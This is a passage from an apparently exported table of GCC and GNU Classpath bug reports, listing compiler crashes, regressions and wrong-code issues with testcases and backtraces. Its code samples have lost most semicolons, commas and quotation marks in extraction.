    <t>Bootstrap including gfortran has been broken on native i386-pc-mingw32 for at least 10 days with the C compiler having an ICE while compiling libgfortran/io/write.c. I finally found the opportunity to reduce the ICE to the following code:
$ cat write.i
extern void fflush (int)
extern __attribute__ ((__dllimport__)) int _iob[]
static int __gthrw_pthread_once () __attribute__ ((__weakref__(pthread_once)))
void flush_if_preconnected ()
{
  fflush (_iob[0])
}
$ C:/msys/1.0.10/home/FX/ibin/gcc/cc1.exe write.i -quiet
write.i:8: internal compiler error: Segmentation fault
The backtrace I could get from gdb looks seriously garbled:
Program received signal SIGSEGV Segmentation fault.
decl_assembler_name_equal (decl=0x2ae2360 asmname=0x2ae1930)
    at ../../trunk/gcc/tree.c:323
323       if (IDENTIFIER_POINTER (decl_asmname)[0] == '*')
(gdb) where
#0  decl_assembler_name_equal (decl=0x2ae2360 asmname=0x2ae1930)
    at ../../trunk/gcc/tree.c:323
#1  0x00512973 in decl_assembler_name_equal (decl=0x2ae1930 
    asmname=0x290f200) at ../../trunk/gcc/tree.c:314
#2  0x00512973 in decl_assembler_name_equal (decl=0x0 asmname=0x3d2412)
    at ../../trunk/gcc/tree.c:314
#3  0x00512973 in decl_assembler_name_equal (decl=0x3d2412 asmname=0x0)
    at ../../trunk/gcc/tree.c:314
#4  0x00512973 in decl_assembler_name_equal (decl=0x3d2412 asmname=0x0)
    at ../../trunk/gcc/tree.c:314
#5  0x00512973 in decl_assembler_name_equal (decl=0x0 asmname=0x0)
    at ../../trunk/gcc/tree.c:314
#6  0x00512973 in decl_assembler_name_equal (decl=0x3 asmname=0x3d24a0)
    at ../../trunk/gcc/tree.c:314
#7  0x00512973 in decl_assembler_name_equal (decl=0x3a asmname=0x4)
    at ../../trunk/gcc/tree.c:314
#8  0x00512973 in decl_assembler_name_equal (decl=0x1 asmname=0x9)
    at ../../trunk/gcc/tree.c:314
#9  0x00512973 in decl_assembler_name_equal (decl=0x0 asmname=0x2)
    at ../../trunk/gcc/tree.c:314
#10 0x00512973 in decl_assembler_name_equal (decl=0x401280 asmname=0x0)
    at ../../trunk/gcc/tree.c:314
#11 0x00512973 in decl_assembler_name_equal (decl=)
    at ../../trunk/gcc/tree.c:314
Backtrace stopped: previous frame inner to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>GCC-44914</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in calc_dfs_tree at dominance.c:395 with -fipa-sra -fnon-call-exceptions</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O[123s] -fipa-sra -fnon-call-exceptions testcase.C
Compiler output:
$ gcc -O1 -fipa-sra -fnon-call-exceptions testcase.C 
testcase.C: In function 'B::B(int)':
testcase.C:17:4: internal compiler error: in calc_dfs_tree at dominance.c:396
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r162056 - crash
r161170 - crash
r159696 - OK
r158969 - OK
4.5 r160526 - OK</t>
  </si>
  <si>
    <t>CLASSPATH-28987</t>
  </si>
  <si>
    <t>IdentityHashMap inefficiency</t>
  </si>
  <si>
    <t>Currently IdentityHashMap uses tombstones to mark deleted slots.
However since this class uses linear probing it can take advantage
of Knuth's algorithm R (section 6.4) instead.  This is more efficient.
Also some variant of Martin's patch should go in:
http://developer.classpath.org/pipermail/classpath-patches/2006-April/001430.html</t>
  </si>
  <si>
    <t>GCC-37223</t>
  </si>
  <si>
    <t>[4.4 regression] internal compiler error: in referenced_var_lookup at tree-dfa.c:563</t>
  </si>
  <si>
    <t>This nights trunk fails (gcc of Aug 19th was still fine) with:
gfortran -c -O3 -ffast-math -funroll-loops -ftree-vectorize -march=native -ffree-form -D__GFORTRAN -D__FFTSG -g -v pw_spline_utils.F
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /data/vondele/gcc_bench/gcc_trunk/gcc/configure --prefix=/data/vondele/gcc_bench/gcc_trunk/build --enable-languages=cfortran
Thread model: posix
gcc version 4.4.0 20080823 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-c' '-O3' '-ffast-math' '-funroll-loops' '-ftree-vectorize'  '-ffree-form' '-D__GFORTRAN' '-D__FFTSG' '-g' '-v'
 /data/vondele/gcc_bench/gcc_trunk/build/libexec/gcc/x86_64-unknown-linux-gnu/4.4.0/f951 pw_spline_utils.F -cpp /tmp/ccfcaaIN.f90 -quiet -v -D__GFORTRAN -D__FFTSG pw_spline_utils.F -march=core2 -mcx16 -msahf --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=4096 -mtune=core2 -ffast-math -funroll-loops -ftree-vectorize -ffree-form -g -fworking-directory -O3 -march=core2 -mcx16 -msahf --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=4096 -mtune=core2 -quiet -dumpbase pw_spline_utils.F -auxbase pw_spline_utils -g -O3 -version -ffast-math -funroll-loops -ftree-vectorize -ffree-form -fintrinsic-modules-path /data/vondele/gcc_bench/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/finclude -o /tmp/cc2IAzfr.s
ignoring nonexistent directory /data/vondele/gcc_bench/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
 /data/vondele/gcc_bench/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/finclude
 .
#include  search starts here:
 /usr/local/include
 /data/vondele/gcc_bench/gcc_trunk/build/include
 /data/vondele/gcc_bench/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/include
 /data/vondele/gcc_bench/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/include-fixed
 /usr/include
End of search list.
GNU Fortran (GCC) version 4.4.0 20080823 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.0 20080823 (experimental) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
pw_spline_utils.F: In function â€˜T.974â€™:
pw_spline_utils.F:1482: internal compiler error: in referenced_var_lookup at tree-dfa.c:563
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
testcase to be attached</t>
  </si>
  <si>
    <t>GCC-69599</t>
  </si>
  <si>
    <t>[6 Regression] libgomp.c fipa-pta tests compiled with -flto -flto-partition=max fail in execution</t>
  </si>
  <si>
    <t>...
close result is child killed: segmentation violation
FAIL: libgomp.c/omp-nested-2.c execution test
...</t>
  </si>
  <si>
    <t>GCC-51641</t>
  </si>
  <si>
    <t>Lookup finds enclosing class member instead of template parameter</t>
  </si>
  <si>
    <t>Another case of the lookup problem you fixed previously has come up on the core mailing list:
struct A {
    struct B { typedef int X }
}
template struct C : A {
    B::X q // Ok: A::B.                                                                       
    struct U { typedef int X }
    template
        struct D
}
template
template
struct C::D {
    typename U::X r // { dg-error  }
C::D y
The use of U in D should find the template parameter leading to an error on instantiation.</t>
  </si>
  <si>
    <t>GCC-10014</t>
  </si>
  <si>
    <t>Problems with #include  __BASE_FILE__ in different dirrectories</t>
  </si>
  <si>
    <t>Let's create a simple test.c file with only one line:
/******************* begin test.c ********************/
#include in.h
/******************* end test.c **********************/
and create this header file in.h as following:
/******************* begin in.h **********************/
#ifndef     SWSIZE
  #define   SWSIZE 1
  #include  __BASE_FILE__
  #undef    SWSIZE
  #define   SWSIZE 2
#endif
#if ( SWSIZE == 1 )
// some special definitions
#else
// some special definitions
#endif
/********************** end in.h ********************/
if both files are in the same dirrectory then we can
succesfully compile it with the following command:
cc -c test.c
but if in.h is for example in INCLUDE dirrectory then
cc -c -IINCLUDE test.c
produces the following message:
In file included from test.c:1:
INCLUDE/in.h:3: test.c: No such file or directory
It is possible to solve it by dirrective like:
cc -c -IINCLUDE $(PWD)/test.c
but it seems a little bit strange!
Release:
gcc-2.95.3 gcc-3.0 gcc-3.2
Environment:
Linux Red Hat 7.1 and Linux Suse 8.0</t>
  </si>
  <si>
    <t>ilgis</t>
  </si>
  <si>
    <t>GCC-17091</t>
  </si>
  <si>
    <t>gfortran MAIN__ symbol not marked TREE_PUBLIC</t>
  </si>
  <si>
    <t>When gfortran synthesizes the MAIN__ symbol the decl is not receiving the
attribute TREE_PUBLIC which is causing problems on AIX because the symbol is
not being globalized.
(gdb) break assemble_start_function
Breakpoint 5 at 0x10103808: file /farm/dje/src/src/gcc/varasm.c line 1184.
(gdb) run foo.f90
 MAIN__
Breakpoint 5 assemble_start_function (decl=0x3005f380 
    fnname=0x200c4855 MAIN__) at /farm/dje/src/src/gcc/varasm.c:1184
(gdb) print decl-&gt;common.public_flag
$2 = 0</t>
  </si>
  <si>
    <t>GCC-17483</t>
  </si>
  <si>
    <t>[4.0 regression] ICE at -O3 when passing a reference.</t>
  </si>
  <si>
    <t>Compiling the following valid code snippet (inspired by PR6189)
on mainline with -O3 yields an ICE:
===================================
struct A
{
    int i
    int }
}
A foo()
{
    A a
    a.ref()=0
    return a
}
void bar()
{
    foo()
}
===================================
bug.cc: In function `void bar()':
bug.cc:15: error: address taken but ADDRESSABLE bit not set
D.1590
bug.cc:15: internal compiler error: verify_stmts failed.
Please submit a full bug report [etc.]
The regression was introduced 2004-09-13 or 2004-09-14.</t>
  </si>
  <si>
    <t>CLASSPATH-33746</t>
  </si>
  <si>
    <t>atexit call in Gtk+ peers causing problems with JikesRVM</t>
  </si>
  <si>
    <t>http://jira.codehaus.org/browse/RVM-51
So the failure is that gtk peers uses an atexit routine. When we call the system call exit this is triggering the atexit routine that is calling JNI methods that can never enter as the system call doesn't transition the virtual processor status from IN_JAVA to IN_NATIVE.</t>
  </si>
  <si>
    <t>GCC-34346</t>
  </si>
  <si>
    <t>Bug box Assert_Failure atree.adb:812 in legal Ada 2005 program</t>
  </si>
  <si>
    <t>package test1 is
   package pak2 is
      x1: integer
   end pak2
   type T1 is interface
   type T2 is interface
   procedure p1(x2: T1 x3: integer := pak2.x1) is abstract
   type T3 is new T2 and T1 with null record
   procedure p1(x2: T3 x3: integer := pak2.x1) -- line 13
end test1
gnatmake -gnat05 test1
gcc-4.1 -c -gnat05 test1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.1.3 20070518 (prerelease) (Debian 4.1.2-8) (x86_64-pc-linux-gnu)       |
| Assert_Failure atree.adb:812                                             |
| Error detected at test1.ads:13:44                                        |
gcc -c -gnat05 test1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.2.2 (i686-unknown-linux-gnu) Assert_Failure atree.adb:812              |
| Error detected at test1.ads:15:44                                        |</t>
  </si>
  <si>
    <t>GCC-70675</t>
  </si>
  <si>
    <t>[6 Regression] compare-debug failure building LLVM</t>
  </si>
  <si>
    <t>Looks related to PR70594.
markus@x4 tmp % g++ --save-temps -O0 -fcompare-debug -c WinCOFFObjectWriter.ii
g++: error: WinCOFFObjectWriter.ii: -fcompare-debug failure
markus@x4 tmp % diff -u WinCOFFObjectWriter.gkd WinCOFFObjectWriter.gk.gkd
--- WinCOFFObjectWriter.gkd     2016-04-15 09:00:15.277105520 +0200
+++ WinCOFFObjectWriter.gk.gkd  2016-04-15 09:00:19.370332015 +0200
@@ -132497 +132497 @@
 11:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;
@@ -142367 +142367 @@
 11:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;
@@ -195197 +195197 @@
 10:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;
@@ -203157 +203157 @@
 15:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;
@@ -275637 +275637 @@
 164:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;
@@ -882377 +882377 @@
 7:   struct StringTableBuilder Strings = TARGET_EXPR &lt;D.xxxx &lt;&lt;&lt; Unknown tree: aggr_init_expr
   6
   __comp_ctor 
-  D.174619
+  D.174622
   (struct StringTableBuilder *) &gt;&gt;
   1
   1 &gt;&gt;&gt;&gt;</t>
  </si>
  <si>
    <t>GCC-65550</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE (segfault) with pch</t>
  </si>
  <si>
    <t>seen building the mp4v2 package in Debian unstable with r221551 and pch enabled. disabling pch lets the package build succeed.
Program received signal SIGABRT Aborted.
0x00007ffff690a107 in raise () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007ffff690a107 in raise () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007ffff690b4e8 in abort () from /lib/x86_64-linux-gnu/libc.so.6
#2  0x000000000136f69a in linemap_add(line_maps* lc_reason unsigned int char const* unsigned int) ()
#3  0x000000000136f913 in linemap_line_start(line_maps* unsigned int unsigned int) ()
#4  0x000000000136fae1 in linemap_position_for_column(line_maps* unsigned int) ()
#5  0x000000000136dbc2 in _cpp_lex_direct ()
#6  0x000000000136eaee in _cpp_lex_token ()
#7  0x0000000001373a98 in cpp_get_token_1(cpp_reader* unsigned int*) ()
#8  0x00000000008760ed in c_lex_with_flags(tree_node** unsigned int* unsigned char* int) ()
#9  0x0000000000715a50 in cp_lexer_get_preprocessor_token(cp_lexer* cp_token*) ()
#10 0x000000000074c9df in c_parse_file() ()
#11 0x000000000087e673 in c_common_parse_file() ()
#12 0x0000000000cc2662 in compile_file() ()
#13 0x0000000000611a3d in toplev::main(int char**) ()
#14 0x00000000006128fa in main ()</t>
  </si>
  <si>
    <t>GCC-22557</t>
  </si>
  <si>
    <t>Legal program runs incorrectly RM 4.5.1(6): array xor array</t>
  </si>
  <si>
    <t>with Ada.Text_IO use Ada.Text_IO
procedure Test_4_5_1_6 is
   type T is array (Positive range ) of Boolean
   pragma Pack (T)
   A : constant T := (1 .. 5 =&gt; True)
   B : constant T := (6 .. 10 =&gt; False)
   C : constant T := A xor B
begin
   Put (()
   for K in C'Range loop
      Put (Integer'Image (K) 
      if K &lt; C'Last then
         Put ( )
      end if
   end loop
   Put_Line ())
end Test_4_5_1_6
Per RM 4.5.1(6) the bounds of the resulting array are those of the left
operand.  Thus the expected output is:
( 1 =&gt; TRUE  2 =&gt; TRUE  3 =&gt; TRUE  4 =&gt; TRUE  5 =&gt; TRUE)
However with gcc-4.0 I get:
( 6 =&gt; TRUE  7 =&gt; TRUE  8 =&gt; TRUE  9 =&gt; TRUE  10 =&gt; TRUE)
I observed this with gnat 3.15p from AdaCore and
gcc 4.0.1 20050503 (prerelease) (Debian 4.0.0-2).
-- 
Ludovic Brenta.</t>
  </si>
  <si>
    <t>GCC-56821</t>
  </si>
  <si>
    <t>Unable to overload with references to 'this'.</t>
  </si>
  <si>
    <t>Created attachment 29783
This is a reference for 'this' toy.
Here is a busybox I wrote to play with the new feature in gcc-4.8.1 and trunk:
--------------------------------------------------------
class Foo
{
public:
  Foo(int i) : _M_i(i) { }
  int bar()  }
  int bar() const  }
  int bar()  }
private:
  int _M_i = 42
}
int
main()
{
  Foo ph(333)
  ph.bar()
  const Foo ff(123)
  ff.bar()
  Foo(333).bar()
}
--------------------------------------------------------
It looks to me reading the standard 8.3.5 that the three bar() methods should be overloadable. I get a linker error though:
--------------------------------------------------------
[ed@localhost ref_this]$ ../bin/bin/g++ -std=c++11 -o ref_this ref_this.cpp
/tmp/ccwPhzqr.s: Assembler messages:
/tmp/ccwPhzqr.s:73: Error: symbol `_ZN3Foo3barEv' is already defined
--------------------------------------------------------
If I comment out 'int bar() const &amp;' I am unable to resolve 'ff.bar()':
--------------------------------------------------------
[ed@localhost ref_this]$ ../bin/bin/g++ -std=c++11 -o ref_this ref_this.cpp
ref_this.cpp: In function â€˜int main()â€™:
ref_this.cpp:26:10: error: no matching function for call to â€˜Foo::bar() constâ€™
   ff.bar()
          ^
ref_this.cpp:26:10: note: candidates are:
ref_this.cpp:11:7: note: int Foo::bar() &amp;
   int bar()  }
       ^
ref_this.cpp:11:7: note:   no known conversion for implicit â€˜thisâ€™ parameter from â€˜const Fooâ€™ to â€˜Foo&amp;â€™
ref_this.cpp:13:7: note: int Foo::bar() &amp;&amp;
   int bar()  }
       ^
ref_this.cpp:13:7: note:   no known conversion for implicit â€˜thisâ€™ parameter from â€˜const Fooâ€™ to â€˜Foo&amp;&amp;â€™
--------------------------------------------------------
I think this is gcc bug.</t>
  </si>
  <si>
    <t>3dw4rd</t>
  </si>
  <si>
    <t>GCC-1457</t>
  </si>
  <si>
    <t>sleep(0) sleeps forever</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Known bug in libgcj 2.95.x already fixed in cvs and snapshot releases.
</t>
  </si>
  <si>
    <t>GCC-46504</t>
  </si>
  <si>
    <t>LTO failed on 483.xalancbmk in SPEC CPU 2006</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 166795 gave
/export/gnu/import/svn/gcc-test-spec/usr/bin/g++  -O3 -funroll-loops -ffast-math
 -fwhole-program -flto=jobserver  -DSPEC_CPU_LP64 ...
In file included from :617:0:
./xercesc/internal/ValidationContextImpl.hpp: In member function â€˜getValidatingMemberTypeâ€™:
./xercesc/internal/ValidationContextImpl.hpp:175:0: internal compiler error: in get_alias_set at alias.c:717
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [/tmp/cckGnQ6e.ltrans6.ltrans.o] Error 1
lto-wrapper: make returned 2 exit status
collect2: lto-wrapper returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-78153</t>
  </si>
  <si>
    <t>strlen return value can be assumed to be less than PTRDIFF_MAX</t>
  </si>
  <si>
    <t>Due to the limits of ptrdiff_t the size of no object can exceed that of PTRDIFF_MAX.  As a result the return value of any valid strlen call can be assumed to be less than PTRDIFF_MAX.  This might open up some optimization opportunities down the line such as that after conversion to a signed type of the same size the result is non-negative.  The test case below shows that GCC currently doesn't take advantage of this assumption.
$ cat b.c &amp;&amp; /build/gcc-git/gcc/xgcc -B/build/gcc-git/gcc -O2 -S -Wall -Wextra -Wpedantic -fdump-tree-optimized=/dev/stdout b.c
extern __SIZE_TYPE__ strlen (const char*)
void f (const char *s)
{
  if (__PTRDIFF_MAX__ &lt;= strlen (s))
    __builtin_abort ()
}
void g (const char *s)
{
  __PTRDIFF_TYPE__ n = strlen (s)
  if (n &lt; 0)
    __builtin_abort ()
}
 Function f (f funcdef_no=0 decl_uid=1795 cgraph_uid=0 symbol_order=0)
f (const char * s)
{
  long unsigned int _1
  :
  _1 = strlen (s_3(D))
  if (_1 &gt; 9223372036854775806)
    goto 
  else
    goto 
  :
  __builtin_abort ()
  :
  return
}
 Function g (g funcdef_no=1 decl_uid=1798 cgraph_uid=1 symbol_order=1)
g (const char * s)
{
  long int n
  long unsigned int _1
  :
  _1 = strlen (s_3(D))
  n_4 = (long int) _1
  if (n_4 &lt; 0)
    goto 
  else
    goto 
  :
  __builtin_abort ()
  :
  return
}</t>
  </si>
  <si>
    <t>GCC-19938</t>
  </si>
  <si>
    <t>Missed jump threading opportunity due to signedness difference</t>
  </si>
  <si>
    <t>Consider:
void
foo (int length int *array)
{
  int i
  for (i = 0 i &lt; length i++)
    {
      if (array[i] != 0)
	{
	  int j
	  for (j = 0 j &lt; length j++)
	  if (j != length)
	    array[i] = 0
	}
    }
}
A part of the last tree SSA form looks like so:
:
  j_16 = j_15 + 1
  D.1187_17 = (unsigned int) length_4
  if (j_16 != D.1187_17) goto  else goto 
:
  if (length_4 != j_16) goto  else goto 
Note that when we take edge from  to  we know that we leave 
for  because length_4 == D.1187_17 == j_16 but we don't notice that
because a sign-changing cast is in the way.
CSE pickes up this optimization oportunity.
Reduced from reload.c:find_reloads.</t>
  </si>
  <si>
    <t>GCC-1090</t>
  </si>
  <si>
    <t>g++ 20001218 generates wrong optimized code on alpha</t>
  </si>
  <si>
    <t>When compiled with -O0
ovi:seahawk:bug3&gt;&gt; exe
n is 1   a = 7
When compiled with -O1
ovi:seahawk:bug3&gt;&gt; exe
n is 4875744     a = 7
The problem disappears when line:
  E &lt;&lt; n
is commented out or line:
  c = 0while( n%5  == 0 ){c += 1n /= 5}
is commented out.
gcc 2.95.2.1 generates correct code.
Release:
gcc version 2.97 20001218 (experimental)
Environment:
Redhat 7.0 for alpha
Linux seahawk.physics.utoronto.ca 2.2.17-ovi #3 Sat Dec 9 23:22:58 EST 2000 alpha unknown
g++ -c -O1 -v -save-temps main.cc
Reading specs from /usr/local/Packages/lang/gcc/gcc.head/install/lib/gcc-lib/alphaev6-unknown-linux-gnu/2.97/specs
Configured with: ../gcc/configure --prefix=/usr/local/Packages/lang/gcc/gcc.head/install --enable-languages=c++ --enable-shared --enable-haifa --disable-nls : (reconfigured)  : (reconfigured) ../gcc/configure --prefix=/usr/local/Packages/lang/gcc/gcc.head/install --enable-languages=c++ --enable-shared --enable-haifa --disable-nls
gcc version 2.97 20001218 (experimental)
GNU CPP version 2.97 20001218 (experimental) (cpplib) (Alpha GNU/Linux for ELF)
ignoring nonexistent directory /usr/local/include/g++-v3
ignoring nonexistent directory /usr/local/lib/gcc-lib/alphaev6-unknown-linux-gnu/2.97/include
ignoring nonexistent directory /usr/local/alphaev6-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/Packages/lang/gcc/gcc.head/install/include/g++-v3
 /usr/local/include
 /usr/local/Packages/lang/gcc/gcc.head/install/lib/gcc-lib/alphaev6-unknown-linux-gnu/2.97/include
 /usr/local/Packages/lang/gcc/gcc.head/install/alphaev6-unknown-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/Packages/lang/gcc/gcc.head/install/lib/gcc-lib/alphaev6-unknown-linux-gnu/2.97/cc1plus -fpreprocessed main.ii -quiet -dumpbase main.cc -O1 -version -fnew-abi -o main.s
....
How-To-Repeat:
See attachment. Compare the output of the executable 
compiled with -O0 and -O1.</t>
  </si>
  <si>
    <t>ovi</t>
  </si>
  <si>
    <t>GCC-13212</t>
  </si>
  <si>
    <t>JNI/CNI AttachCurrentThread does not register thread with garbage collector</t>
  </si>
  <si>
    <t>Every version of GCC with Java support &lt;= 3.3.2 I have tried (3.3.2 3.3.1 3.1)
doesn't handle the AttachCurrentThread call working with native code. The bug is
similar to the one reported for Kaffe that can be found searching on google. 
Here's a gcc -v:
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/specs
Configured with: /var/tmp/portage/gcc-3.3.2-r2/work/gcc-3.3.2/configure
--prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.3
--includedir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/man
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/info --enable-shared
--host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --with-system-zlib
--enable-languages=cc++f77objcjava --enable-threads=posix --enable-long-long
--disable-checking --enable-cstdio=stdio --enable-clocale=generic
--enable-__cxa_atexit --enable-version-specific-runtime-libs
--with-gxx-include-dir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3
--with-local-prefix=/usr/local --enable-shared --disable-nls
--x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib
--enable-interpreter --enable-java-awt=xlib --with-x --disable-multilib
Thread model: posix
gcc version 3.3.2 20031022 (Gentoo Linux 3.3.2-r2 propolice)
The behaviour is simple to reproduce: try using this (anyway the bug applies to
JNI interface too)
--hello.cc start--
#include 
#include hello.h
#include 
#include 
using namespace std
using namespace java::lang
static pthread_t attachable
void * subStart(void *th) {
                cerr &lt;&lt; Before attach &lt;&lt; endl
                jstring threadName = (jstring)th
                Thread *tp = JvAttachCurrentThread(NULL NULL)
                cerr &lt;&lt; I am attached &lt;&lt; endl
                int i = 0
                while(1)  {
                        cerr &lt;&lt; detached for  &lt;&lt; i++ &lt;&lt;  quarters &lt;&lt;endl
                        usleep(50000)
                }
}
void *subStop(void *null) {
                JvDetachCurrentThread()
                cerr &lt;&lt; I am detached &lt;&lt; endl
}
void ::hello::start() {
        cerr &lt;&lt; I am in start() &lt;&lt; endl
        cerr &lt;&lt; Result is  &lt;&lt; (int)JvCreateJavaVM(NULL) &lt;&lt; endl
        jstring zocchia = JvNewStringUTF(suka)
        JvAttachCurrentThread(NULL NULL)
        pthread_create(
}
void ::hello::stop() {
        cerr &lt;&lt; I am in stop() &lt;&lt; endl
        pthread_cancel(attachable)
        pthread_join(attachable NULL)
        cerr &lt;&lt; Joined!&lt;&lt; endl
}
--hello.cc stop--
--hello.java start--
import java.io.*
class hello {
        public native void start()
        public native void stop()
        static {
        //      System.loadLibrary(hello)
        }
        public static void main(String[] argv) throws Exception {
                hello z = new hello()
                z.start()
                Thread.sleep(2000)
                z.stop()
                System.out.println(Thread stopped)
        }
}
--hello.java stop--
Upon AttachCurrentThread the program gets killed by a SIGSEGV.
GDB session detectes the problem is:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1102085424 (LWP 17776)]
GC_local_malloc_atomic (bytes=32)
    at ../../../gcc-3.3.2/boehm-gc/linux_threads.c:361
361             ptr_t my_entry = *my_fl
(gdb) bt
#0  GC_local_malloc_atomic (bytes=32)
    at ../../../gcc-3.3.2/boehm-gc/linux_threads.c:361
#1  0x40448d9e in _Jv_AllocPtrFreeObject (klass=0x4 size=32) at java-gc.h:53
#2  0x40470180 in _Jv_AllocString (len=16)
    at ../../../gcc-3.3.2/libjava/java/lang/natString.cc:399
#3  0x404701c2 in _Jv_NewString (chars=0x4 len=16)
    at ../../../gcc-3.3.2/libjava/java/lang/natString.cc:414
#4  0x4047257c in java::lang::Thread::gen_name() () at cni.h:52
#5  0x4047271b in _Jv_AttachCurrentThread (name=0x0 group=0x0)
    at ../../../gcc-3.3.2/libjava/java/lang/natThread.cc:406
#6  0x08049196 in JvAttachCurrentThread(java::lang::String*
java::lang::ThreadGroup*) ()
#7  0x08048f00 in subStart(void*) ()
#8  0x408e1332 in start_thread () from /lib/tls/libpthread.so</t>
  </si>
  <si>
    <t>alessio</t>
  </si>
  <si>
    <t>GCC-30561</t>
  </si>
  <si>
    <t>[DR 696] istream::operator&gt;&gt;(int&amp;) broken</t>
  </si>
  <si>
    <t>Here's a test case for the problem I point out in c++std-lib-17897. It shows that operator&gt;&gt;(int&amp;) behaves differently (and I claim incorrectly) from operator&gt;&gt;(long&amp;) or any other extractor except the one for short (which is
affected for the same reason).
$ cat t.cpp &amp;&amp; g++ t.cpp -static &amp;&amp; ./a.out
#include 
#include 
#include 
struct NumPunct: std::numpunct
{
    std::string do_grouping () const { return \3 }
    char do_thousands_sep () const { return '' }
}
template 
T extract (const char *s)
{
    std::istringstream strm (s)
    strm.imbue (std::locale (strm.getloc () new NumPunct))
    T x = T ()
    strm &gt;&gt; x
    assert ((strm.failbit | strm.eofbit) == strm.rdstate ())
    return x
}
int main ()
{
    assert (123L == extract(123))
    assert (123  == extract(123))
}
Assertion failed: 123 == extract(123) file t.cpp line 26
Abort (core dumped)</t>
  </si>
  <si>
    <t>GCC-28473</t>
  </si>
  <si>
    <t>[4.0 Regression] with -O casting result of round(x) to uint64_t produces wrong values for x &gt; INT_MAX</t>
  </si>
  <si>
    <t>When compiling with -O or greater optimization and if x &gt; INT_MAX then code like this:
     uint64_t y = (uint64_t)round(x)
assigns the wrong value to y (the top 32 bits are all 1s).  But this code assigns the right value to z:
     double dz = round(x)
     uint64_t z = dz
It almost seems as if gcc -O in some cases compiles using a built-in declaration of round() that returns a 32-bit int.
(1) GCC VERSION
gavia% gcc -v
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.1 20060525 (Red Hat 4.1.1-1)
This is on Fedora Core 5.  Same problem occurs with gcc 4.0.2 on FC4.
(2) COMMAND LINE COMPILER OUTPUT AND PROGRAM OUTPUT
gavia% gcc -Wall -std=c99 -O -save-temps -o x-opt x.c -lm
gavia% ./x-opt
x: 2147483648
y: 18446744071562067968
z: 2147483648
(3) C SOURCE
#include 
#include 
#include 
int main(int c char **v)
{
     uint64_t x = 2147483648ULL /* INT_MAX+1 */
     printf(x: %llu\n x)
     uint64_t y = (uint64_t)round(x)
     printf(y: %llu\n y)
     double dz = round(x)
     uint64_t z = dz
     printf(z: %llu\n z)
     return 0
}
(4) PREPROCESSED FILE
Included as attachment.</t>
  </si>
  <si>
    <t>maxp</t>
  </si>
  <si>
